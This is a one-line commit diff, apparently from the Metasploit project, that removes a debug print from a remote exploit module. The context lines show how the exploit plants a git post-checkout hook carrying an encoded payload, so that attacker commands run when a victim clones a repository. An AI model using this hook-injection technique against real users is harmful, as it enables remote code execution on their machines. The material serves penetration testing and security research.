Remove redundant debugging stuff

bug/bundler_fix
Meatballs 2014-12-23 14:09:12 +00:00
parent 42a10d6d50
commit 43221d4cb0
No known key found for this signature in database
GPG Key ID: 5380EAF01F2F8B38
1 changed files with 0 additions and 1 deletions

View File

@ -128,7 +128,6 @@ class Metasploit4 < Msf::Exploit::Remote
# .git/hooks/post-checkout and will subsequently execute commands of our
# choosing upon cloning
# build the hook file blob
puts target.inspect
case target.name
when 'Automatic'
full_cmd = "#!/bin/sh\n#{payload.encoded}\n"